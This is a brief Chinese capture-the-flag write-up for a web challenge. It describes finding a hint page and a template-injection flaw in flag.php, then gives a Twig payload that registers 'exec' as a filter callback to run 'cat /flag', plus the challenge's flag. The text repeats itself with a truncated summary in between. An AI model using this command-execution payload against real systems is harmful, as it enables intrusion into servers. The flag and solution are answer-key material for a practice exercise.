
酷炫的欢迎界面,有1个flag.php和hint.php
hint.php的页面元素发现了提示

去flag.php发现存在模板注入

然后提示说研究cookie,使用payload
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}};

flag:flag{985a0930-71c5-4a1a-9b7e-229400ecab55}
"本文介绍了一个关于Web安全的实例,涉及到模板注入漏洞的利用。通过访问含有flag.php和hint.php的欢迎界面,发现可以使用特定payload {{_self.env.registerUndefinedFilterCallback(""exec"")}

酷炫的欢迎界面,有1个flag.php和hint.php
hint.php的页面元素发现了提示

去flag.php发现存在模板注入

然后提示说研究cookie,使用payload
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}};

flag:flag{985a0930-71c5-4a1a-9b7e-229400ecab55}

被折叠的 条评论
为什么被折叠?
